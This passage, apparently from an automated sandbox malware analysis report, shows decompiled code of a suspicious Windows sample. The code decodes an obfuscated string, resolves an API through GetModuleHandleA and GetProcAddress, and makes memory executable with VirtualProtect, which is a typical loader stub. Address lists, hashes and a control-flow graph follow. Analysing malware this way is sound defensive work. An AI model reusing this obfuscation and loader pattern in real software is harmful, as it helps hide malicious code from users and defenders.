                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v12 =  *0x41066c;
                                                                                                                                                                                            					_v12 =  *0x410668;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v12 =  *0x410664;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v12 =  *0x410660;
                                                                                                                                                                                            					_v12 =  *0x41065c;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v12 =  *0x410658;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v12 =  *0x410654;
                                                                                                                                                                                            					_v12 =  *0x410650;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v8 =  *0x41064c;
                                                                                                                                                                                            				_v8 =  *0x410648;
                                                                                                                                                                                            				_v8 =  *0x410644;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v8 =  *0x410640;
                                                                                                                                                                                            					_v8 =  *0x41063c;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v8 =  *0x410638;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v8 =  *0x410634;
                                                                                                                                                                                            					_v8 =  *0x410630;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v8 =  *0x41062c;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v8 =  *0x410628;
                                                                                                                                                                                            					_v8 =  *0x410624;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v8 =  *0x410620;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v8 =  *0x41061c;
                                                                                                                                                                                            					_v8 =  *0x410618;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v8 =  *0x410614;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v8 =  *0x410610;
                                                                                                                                                                                            					_v8 =  *0x41060c;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v92 =  *0x410608;
                                                                                                                                                                                            				_v92 =  *0x410604;
                                                                                                                                                                                            				_v92 =  *0x410600;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v92 =  *0x4105fc;
                                                                                                                                                                                            					_v92 =  *0x4105f8;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v92 =  *0x4105f4;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v92 =  *0x4105f0;
                                                                                                                                                                                            					_v92 =  *0x4105ec;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v92 =  *0x4105e8;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v92 =  *0x4105e4;
                                                                                                                                                                                            					_v92 =  *0x4105e0;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v92 =  *0x4105dc;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v92 =  *0x4105d8;
                                                                                                                                                                                            					_v92 =  *0x4105d4;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v92 =  *0x4105d0;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v92 =  *0x4105cc;
                                                                                                                                                                                            					_v92 =  *0x4105c8;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v100 =  *0x4105c4;
                                                                                                                                                                                            				_v100 =  *0x4105c0;
                                                                                                                                                                                            				_v100 =  *0x4105bc;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v100 =  *0x4105b8;
                                                                                                                                                                                            					_v100 =  *0x4105b4;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v100 =  *0x4105b0;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v100 =  *0x4105ac;
                                                                                                                                                                                            					_v100 =  *0x4105a8;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v100 =  *0x4105a4;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v100 =  *0x4105a0;
                                                                                                                                                                                            					_v100 =  *0x41059c;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v100 =  *0x410598;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v100 =  *0x410594;
                                                                                                                                                                                            					_v100 =  *0x410590;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v100 =  *0x41058c;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v100 =  *0x410588;
                                                                                                                                                                                            					_v100 =  *0x410584;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v88 =  *0x410580;
                                                                                                                                                                                            				_v88 =  *0x41057c;
                                                                                                                                                                                            				_v88 =  *0x410578;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v88 =  *0x410574;
                                                                                                                                                                                            					_v88 =  *0x410570;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v88 =  *0x41056c;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v88 =  *0x410568;
                                                                                                                                                                                            					_v88 =  *0x410564;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v88 =  *0x410560;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v88 =  *0x41055c;
                                                                                                                                                                                            					_v88 =  *0x410558;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v88 =  *0x410554;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v88 =  *0x410550;
                                                                                                                                                                                            					_v88 =  *0x41054c;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v88 =  *0x410548;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v88 =  *0x410544;
                                                                                                                                                                                            					_v88 =  *0x410540;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v32 =  *0x41053c;
                                                                                                                                                                                            				_v32 =  *0x410538;
                                                                                                                                                                                            				_v32 =  *0x410534;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v32 =  *0x410530;
                                                                                                                                                                                            					_v32 =  *0x41052c;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v32 =  *0x410528;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v32 =  *0x410524;
                                                                                                                                                                                            					_v32 =  *0x410520;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v32 =  *0x41051c;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v32 =  *0x410518;
                                                                                                                                                                                            					_v32 =  *0x410514;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v32 =  *0x410510;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v32 =  *0x41050c;
                                                                                                                                                                                            					_v32 =  *0x410508;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v32 =  *0x410504;
                                                                                                                                                                                            				asm("fcomp qword [0x4104e8]");
                                                                                                                                                                                            				asm("fnstsw ax");
                                                                                                                                                                                            				if((_t648 & 0x00000044) == 0) {
                                                                                                                                                                                            					_v32 =  *0x410500;
                                                                                                                                                                                            					_v32 =  *0x4104fc;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v28 = 0x53;
                                                                                                                                                                                            				_v27 = 0xa9;
                                                                                                                                                                                            				_v26 = 0xbb;
                                                                                                                                                                                            				_v25 = 0x45;
                                                                                                                                                                                            				_v24 = 0x74;
                                                                                                                                                                                            				_v23 = 0x8c;
                                                                                                                                                                                            				_v22 = 0xaf;
                                                                                                                                                                                            				_v21 = 0x77;
                                                                                                                                                                                            				_v20 = 0x36;
                                                                                                                                                                                            				_v19 = 0xbb;
                                                                                                                                                                                            				_v18 = 0xe4;
                                                                                                                                                                                            				_v17 = 0x1f;
                                                                                                                                                                                            				_v16 = 0xfb;
                                                                                                                                                                                            				_v120 = 0;
                                                                                                                                                                                            				while(_v120 < 0xd) {
                                                                                                                                                                                            					_v121 =  *((intOrPtr*)(_t746 + _v120 - 0x18));
                                                                                                                                                                                            					_v121 = (_v121 & 0x000000ff) - _v120;
                                                                                                                                                                                            					_v121 = (_v121 & 0x000000ff) >> 0x00000006 | (_v121 & 0x000000ff) << 0x00000002;
                                                                                                                                                                                            					_v121 = (_v121 & 0x000000ff) + 0xee;
                                                                                                                                                                                            					_v121 =  ~(_v121 & 0x000000ff);
                                                                                                                                                                                            					_v121 = _v121 & 0x000000ff ^ _v120;
                                                                                                                                                                                            					_v121 =  ~(_v121 & 0x000000ff);
                                                                                                                                                                                            					_v121 = (_v121 & 0x000000ff) >> 0x00000002 | (_v121 & 0x000000ff) << 0x00000006;
                                                                                                                                                                                            					_v121 =  !(_v121 & 0x000000ff);
                                                                                                                                                                                            					_v121 = (_v121 & 0x000000ff) + 0x45;
                                                                                                                                                                                            					_v121 = _v121 & 0x000000ff ^ _v120;
                                                                                                                                                                                            					_v121 = (_v121 & 0x000000ff) - _v120;
                                                                                                                                                                                            					_v121 = _v121 & 0x000000ff ^ _v120;
                                                                                                                                                                                            					_v121 = (_v121 & 0x000000ff) + 0x15;
                                                                                                                                                                                            					_v121 = (_v121 & 0x000000ff) >> 0x00000002 | (_v121 & 0x000000ff) << 0x00000006;
                                                                                                                                                                                            					_v121 = (_v121 & 0x000000ff) + 0x89;
                                                                                                                                                                                            					 *((char*)(_t746 + _v120 - 0x18)) = _v121;
                                                                                                                                                                                            					_v120 = _v120 + 1;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_v76 = GetModuleHandleA( &_v28);
                                                                                                                                                                                            				_v40 = 0;
                                                                                                                                                                                            				 *0x437b94 = GetProcAddress(_v76,  &_v72);
                                                                                                                                                                                            				VirtualProtect(_a4, _a8, 0x40,  &_v40); // executed
                                                                                                                                                                                            				return 0;
                                                                                                                                                                                            			}























































                                                                                                                                                                                            0x0040194b
                                                                                                                                                                                            0x00401950
                                                                                                                                                                                            0x00401958
                                                                                                                                                                                            0x00401961
                                                                                                                                                                                            0x00401961
                                                                                                                                                                                            0x0040196a
                                                                                                                                                                                            0x00401970
                                                                                                                                                                                            0x00401976
                                                                                                                                                                                            0x0040197b
                                                                                                                                                                                            0x00401983
                                                                                                                                                                                            0x0040198c
                                                                                                                                                                                            0x0040198c
                                                                                                                                                                                            0x00401995
                                                                                                                                                                                            0x0040199e
                                                                                                                                                                                            0x004019a7
                                                                                                                                                                                            0x004019ad
                                                                                                                                                                                            0x004019b3
                                                                                                                                                                                            0x004019b8
                                                                                                                                                                                            0x004019c0
                                                                                                                                                                                            0x004019c9
                                                                                                                                                                                            0x004019c9
                                                                                                                                                                                            0x004019d2
                                                                                                                                                                                            0x004019d8
                                                                                                                                                                                            0x004019de
                                                                                                                                                                                            0x004019e3
                                                                                                                                                                                            0x004019eb
                                                                                                                                                                                            0x004019f4
                                                                                                                                                                                            0x004019f4
                                                                                                                                                                                            0x004019fd
                                                                                                                                                                                            0x00401a03
                                                                                                                                                                                            0x00401a09
                                                                                                                                                                                            0x00401a0e
                                                                                                                                                                                            0x00401a16
                                                                                                                                                                                            0x00401a1f
                                                                                                                                                                                            0x00401a1f
                                                                                                                                                                                            0x00401a28
                                                                                                                                                                                            0x00401a2e
                                                                                                                                                                                            0x00401a34
                                                                                                                                                                                            0x00401a39
                                                                                                                                                                                            0x00401a41
                                                                                                                                                                                            0x00401a4a
                                                                                                                                                                                            0x00401a4a
                                                                                                                                                                                            0x00401a53
                                                                                                                                                                                            0x00401a59
                                                                                                                                                                                            0x00401a5f
                                                                                                                                                                                            0x00401a64
                                                                                                                                                                                            0x00401a6c
                                                                                                                                                                                            0x00401a75
                                                                                                                                                                                            0x00401a75
                                                                                                                                                                                            0x00401a7e
                                                                                                                                                                                            0x00401a87
                                                                                                                                                                                            0x00401a90
                                                                                                                                                                                            0x00401a96
                                                                                                                                                                                            0x00401a9c
                                                                                                                                                                                            0x00401aa1
                                                                                                                                                                                            0x00401aa9
                                                                                                                                                                                            0x00401ab2
                                                                                                                                                                                            0x00401ab2
                                                                                                                                                                                            0x00401abb
                                                                                                                                                                                            0x00401ac1
                                                                                                                                                                                            0x00401ac7
                                                                                                                                                                                            0x00401acc
                                                                                                                                                                                            0x00401ad4
                                                                                                                                                                                            0x00401add
                                                                                                                                                                                            0x00401add
                                                                                                                                                                                            0x00401ae6
                                                                                                                                                                                            0x00401aec
                                                                                                                                                                                            0x00401af2
                                                                                                                                                                                            0x00401af7
                                                                                                                                                                                            0x00401aff
                                                                                                                                                                                            0x00401b08
                                                                                                                                                                                            0x00401b08
                                                                                                                                                                                            0x00401b11
                                                                                                                                                                                            0x00401b17
                                                                                                                                                                                            0x00401b1d
                                                                                                                                                                                            0x00401b22
                                                                                                                                                                                            0x00401b2a
                                                                                                                                                                                            0x00401b33
                                                                                                                                                                                            0x00401b33
                                                                                                                                                                                            0x00401b3c
                                                                                                                                                                                            0x00401b42
                                                                                                                                                                                            0x00401b48
                                                                                                                                                                                            0x00401b4d
                                                                                                                                                                                            0x00401b55
                                                                                                                                                                                            0x00401b5e
                                                                                                                                                                                            0x00401b5e
                                                                                                                                                                                            0x00401b67
                                                                                                                                                                                            0x00401b70
                                                                                                                                                                                            0x00401b79
                                                                                                                                                                                            0x00401b7f
                                                                                                                                                                                            0x00401b85
                                                                                                                                                                                            0x00401b8a
                                                                                                                                                                                            0x00401b92
                                                                                                                                                                                            0x00401b9b
                                                                                                                                                                                            0x00401b9b
                                                                                                                                                                                            0x00401ba4
                                                                                                                                                                                            0x00401baa
                                                                                                                                                                                            0x00401bb0
                                                                                                                                                                                            0x00401bb5
                                                                                                                                                                                            0x00401bbd
                                                                                                                                                                                            0x00401bc6
                                                                                                                                                                                            0x00401bc6
                                                                                                                                                                                            0x00401bcf
                                                                                                                                                                                            0x00401bd5
                                                                                                                                                                                            0x00401bdb
                                                                                                                                                                                            0x00401be0
                                                                                                                                                                                            0x00401be8
                                                                                                                                                                                            0x00401bf1
                                                                                                                                                                                            0x00401bf1
                                                                                                                                                                                            0x00401bfa
                                                                                                                                                                                            0x00401c00
                                                                                                                                                                                            0x00401c06
                                                                                                                                                                                            0x00401c0b
                                                                                                                                                                                            0x00401c13
                                                                                                                                                                                            0x00401c1c
                                                                                                                                                                                            0x00401c1c
                                                                                                                                                                                            0x00401c25
                                                                                                                                                                                            0x00401c2b
                                                                                                                                                                                            0x00401c31
                                                                                                                                                                                            0x00401c36
                                                                                                                                                                                            0x00401c3e
                                                                                                                                                                                            0x00401c47
                                                                                                                                                                                            0x00401c47
                                                                                                                                                                                            0x00401c50
                                                                                                                                                                                            0x00401c59
                                                                                                                                                                                            0x00401c62
                                                                                                                                                                                            0x00401c68
                                                                                                                                                                                            0x00401c6e
                                                                                                                                                                                            0x00401c73
                                                                                                                                                                                            0x00401c7b
                                                                                                                                                                                            0x00401c84
                                                                                                                                                                                            0x00401c84
                                                                                                                                                                                            0x00401c8d
                                                                                                                                                                                            0x00401c93
                                                                                                                                                                                            0x00401c99
                                                                                                                                                                                            0x00401c9e
                                                                                                                                                                                            0x00401ca6
                                                                                                                                                                                            0x00401caf
                                                                                                                                                                                            0x00401caf
                                                                                                                                                                                            0x0040216f
                                                                                                                                                                                            0x0040216f
                                                                                                                                                                                            0x00402178
                                                                                                                                                                                            0x0040217e
                                                                                                                                                                                            0x00402184
                                                                                                                                                                                            0x00402189
                                                                                                                                                                                            0x00402191
                                                                                                                                                                                            0x0040219a
                                                                                                                                                                                            0x0040219a
                                                                                                                                                                                            0x004021a3
                                                                                                                                                                                            0x004021a9
                                                                                                                                                                                            0x004021af
                                                                                                                                                                                            0x004021b4
                                                                                                                                                                                            0x004021bc
                                                                                                                                                                                            0x004021c5
                                                                                                                                                                                            0x004021c5
                                                                                                                                                                                            0x004021ce
                                                                                                                                                                                            0x004021d4
                                                                                                                                                                                            0x004021da
                                                                                                                                                                                            0x004021df
                                                                                                                                                                                            0x004021e7
                                                                                                                                                                                            0x004021f0
                                                                                                                                                                                            0x004021f0
                                                                                                                                                                                            0x004021f9
                                                                                                                                                                                            0x00402202
                                                                                                                                                                                            0x0040220b
                                                                                                                                                                                            0x00402211
                                                                                                                                                                                            0x00402217
                                                                                                                                                                                            0x0040221c
                                                                                                                                                                                            0x00402224
                                                                                                                                                                                            0x0040222d
                                                                                                                                                                                            0x0040222d
                                                                                                                                                                                            0x00402236
                                                                                                                                                                                            0x0040223c
                                                                                                                                                                                            0x00402242
                                                                                                                                                                                            0x00402247
                                                                                                                                                                                            0x0040224f
                                                                                                                                                                                            0x00402258
                                                                                                                                                                                            0x00402258
                                                                                                                                                                                            0x00402261
                                                                                                                                                                                            0x00402267
                                                                                                                                                                                            0x0040226d
                                                                                                                                                                                            0x00402272
                                                                                                                                                                                            0x0040227a
                                                                                                                                                                                            0x00402283
                                                                                                                                                                                            0x00402283
                                                                                                                                                                                            0x0040228c
                                                                                                                                                                                            0x00402292
                                                                                                                                                                                            0x00402298
                                                                                                                                                                                            0x0040229d
                                                                                                                                                                                            0x004022a5
                                                                                                                                                                                            0x004022ae
                                                                                                                                                                                            0x004022ae
                                                                                                                                                                                            0x004022b7
                                                                                                                                                                                            0x004022bd
                                                                                                                                                                                            0x004022c3
                                                                                                                                                                                            0x004022c8
                                                                                                                                                                                            0x004022d0
                                                                                                                                                                                            0x004022d9
                                                                                                                                                                                            0x004022d9
                                                                                                                                                                                            0x004022e2
                                                                                                                                                                                            0x004022eb
                                                                                                                                                                                            0x004022f4
                                                                                                                                                                                            0x004022fa
                                                                                                                                                                                            0x00402300
                                                                                                                                                                                            0x00402305
                                                                                                                                                                                            0x0040230d
                                                                                                                                                                                            0x00402316
                                                                                                                                                                                            0x00402316
                                                                                                                                                                                            0x0040231f
                                                                                                                                                                                            0x00402325
                                                                                                                                                                                            0x0040232b
                                                                                                                                                                                            0x00402330
                                                                                                                                                                                            0x00402338
                                                                                                                                                                                            0x00402341
                                                                                                                                                                                            0x00402341
                                                                                                                                                                                            0x0040234a
                                                                                                                                                                                            0x00402350
                                                                                                                                                                                            0x00402356
                                                                                                                                                                                            0x0040235b
                                                                                                                                                                                            0x00402363
                                                                                                                                                                                            0x0040236c
                                                                                                                                                                                            0x0040236c
                                                                                                                                                                                            0x00402375
                                                                                                                                                                                            0x0040237b
                                                                                                                                                                                            0x00402381
                                                                                                                                                                                            0x00402386
                                                                                                                                                                                            0x0040238e
                                                                                                                                                                                            0x00402397
                                                                                                                                                                                            0x00402397
                                                                                                                                                                                            0x004023a0
                                                                                                                                                                                            0x004023a6
                                                                                                                                                                                            0x004023ac
                                                                                                                                                                                            0x004023b1
                                                                                                                                                                                            0x004023b9
                                                                                                                                                                                            0x004023c2
                                                                                                                                                                                            0x004023c2
                                                                                                                                                                                            0x004023cb
                                                                                                                                                                                            0x004023d4
                                                                                                                                                                                            0x004023dd
                                                                                                                                                                                            0x004023e3
                                                                                                                                                                                            0x004023e9
                                                                                                                                                                                            0x004023ee
                                                                                                                                                                                            0x004023f6
                                                                                                                                                                                            0x004023ff
                                                                                                                                                                                            0x004023ff
                                                                                                                                                                                            0x00402408
                                                                                                                                                                                            0x0040240e
                                                                                                                                                                                            0x00402414
                                                                                                                                                                                            0x00402419
                                                                                                                                                                                            0x00402421
                                                                                                                                                                                            0x0040242a
                                                                                                                                                                                            0x0040242a
                                                                                                                                                                                            0x00402433
                                                                                                                                                                                            0x00402439
                                                                                                                                                                                            0x0040243f
                                                                                                                                                                                            0x00402444
                                                                                                                                                                                            0x0040244c
                                                                                                                                                                                            0x00402455
                                                                                                                                                                                            0x00402455
                                                                                                                                                                                            0x0040245e
                                                                                                                                                                                            0x00402464
                                                                                                                                                                                            0x0040246a
                                                                                                                                                                                            0x0040246f
                                                                                                                                                                                            0x00402477
                                                                                                                                                                                            0x00402480
                                                                                                                                                                                            0x00402480
                                                                                                                                                                                            0x00402489
                                                                                                                                                                                            0x0040248f
                                                                                                                                                                                            0x00402495
                                                                                                                                                                                            0x0040249a
                                                                                                                                                                                            0x004024a2
                                                                                                                                                                                            0x004024ab
                                                                                                                                                                                            0x004024ab
                                                                                                                                                                                            0x004024b4
                                                                                                                                                                                            0x004024bd
                                                                                                                                                                                            0x004024c6
                                                                                                                                                                                            0x004024cc
                                                                                                                                                                                            0x004024d2

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(00000053), ref: 00402972
                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00000004), ref: 0040298A
                                                                                                                                                                                            • VirtualProtect.KERNELBASE(?,000000FB,00000040,00000000), ref: 004029A3
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                            • String ID: ,$/$1$6$C$E$O$S$`ghv$c$n$t$w$NhvIhvPdhv
                                                                                                                                                                                            • API String ID: 2099061454-1301821488
                                                                                                                                                                                            • Opcode ID: db9b1652acbf82f970014281640f95a39b8928f6f0e74ca52690f7ef009c20de
                                                                                                                                                                                            • Instruction ID: c1d0cadc6033f5e5d0280f64f59870506d21eec9913133e9c41992e24b09aadf
                                                                                                                                                                                            • Opcode Fuzzy Hash: db9b1652acbf82f970014281640f95a39b8928f6f0e74ca52690f7ef009c20de
                                                                                                                                                                                            • Instruction Fuzzy Hash: 58B27D70A06159DBEB108B95FA982EDBF71FB91341F5281A5D1D8360E9C3B811B2CF1E
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            control_flow_graph 446 40ea95-40eaa8 call 4082e4 449 40ead8-40eae3 446->449 450 40eaaa-40eab7 446->450 452 40eae5-40eae7 449->452 453 40eae8-40eaf0 449->453 450->449 451 40eab9-40eace call 409c95 call 4094ac 450->451 477 40ead1-40ead3 451->477 452->453 454 40eaf2-40eaf9 453->454 455 40eb5b-40eb5d 453->455 457 40eb46-40eb48 454->457 458 40eafb-40eb0d 454->458 460 40ebab 455->460 461 40eb5f-40eb65 455->461 457->460 467 40eb4a-40eb59 RtlAllocateHeap 457->467 458->457 464 40eb0f-40eb37 call 40a28a call 40b6b4 call 40eb91 458->464 465 40ebad-40ebb2 call 408329 460->465 462 40eb67-40eb70 call 4088c2 461->462 463 40eb9a-40eb9c 461->463 462->453 478 40eb76-40eb7b 462->478 463->460 470 40eb9e-40eba3 463->470 464->467 484 40eb39-40eb43 call 409fb0 464->484 467->455 470->460 475 40eba5 470->475 475->460 477->465 478->477 480 40eb81-40eb87 478->480 480->477 484->457
                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                            			E0040EA95(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                            				long _t21;
                                                                                                                                                                                            				long _t23;
                                                                                                                                                                                            				long _t24;
                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                            				long _t31;
                                                                                                                                                                                            				signed int _t32;
                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                            				signed int _t45;
                                                                                                                                                                                            				long _t49;
                                                                                                                                                                                            				void* _t52;
                                                                                                                                                                                            				void* _t53;
                                                                                                                                                                                            
                                                                                                                                                                                            				_push(0xc);
                                                                                                                                                                                            				_push(0x412848);
                                                                                                                                                                                            				E004082E4(__ebx, __edi, __esi);
                                                                                                                                                                                            				_t39 =  *(_t52 + 8);
                                                                                                                                                                                            				if(_t39 <= 0) {
                                                                                                                                                                                            					L4:
                                                                                                                                                                                            					_t49 = _t39 *  *(_t52 + 0xc);
                                                                                                                                                                                            					 *(_t52 + 8) = _t49;
                                                                                                                                                                                            					__eflags = _t49;
                                                                                                                                                                                            					if(_t49 == 0) {
                                                                                                                                                                                            						_t49 = 1;
                                                                                                                                                                                            						__eflags = 1;
                                                                                                                                                                                            					}
                                                                                                                                                                                            					do {
                                                                                                                                                                                            						_t38 = 0;
                                                                                                                                                                                            						 *(_t52 - 0x1c) = 0;
                                                                                                                                                                                            						__eflags = _t49 - 0xffffffe0;
                                                                                                                                                                                            						if(_t49 > 0xffffffe0) {
                                                                                                                                                                                            							L13:
                                                                                                                                                                                            							__eflags = _t38;
                                                                                                                                                                                            							if(_t38 != 0) {
                                                                                                                                                                                            								L21:
                                                                                                                                                                                            								_t21 = _t38;
                                                                                                                                                                                            								L22:
                                                                                                                                                                                            								return E00408329(_t21);
                                                                                                                                                                                            							}
                                                                                                                                                                                            							__eflags =  *0x438264; // 0x0
                                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                                            								__eflags = _t38;
                                                                                                                                                                                            								if(_t38 == 0) {
                                                                                                                                                                                            									_t23 =  *(_t52 + 0x10);
                                                                                                                                                                                            									__eflags = _t23;
                                                                                                                                                                                            									if(_t23 != 0) {
                                                                                                                                                                                            										 *_t23 = 0xc;
                                                                                                                                                                                            									}
                                                                                                                                                                                            								}
                                                                                                                                                                                            								goto L21;
                                                                                                                                                                                            							}
                                                                                                                                                                                            							goto L15;
                                                                                                                                                                                            						}
                                                                                                                                                                                            						__eflags =  *0x4386b4 - 3;
                                                                                                                                                                                            						if( *0x4386b4 != 3) {
                                                                                                                                                                                            							L11:
                                                                                                                                                                                            							__eflags = _t38;
                                                                                                                                                                                            							if(_t38 != 0) {
                                                                                                                                                                                            								goto L21;
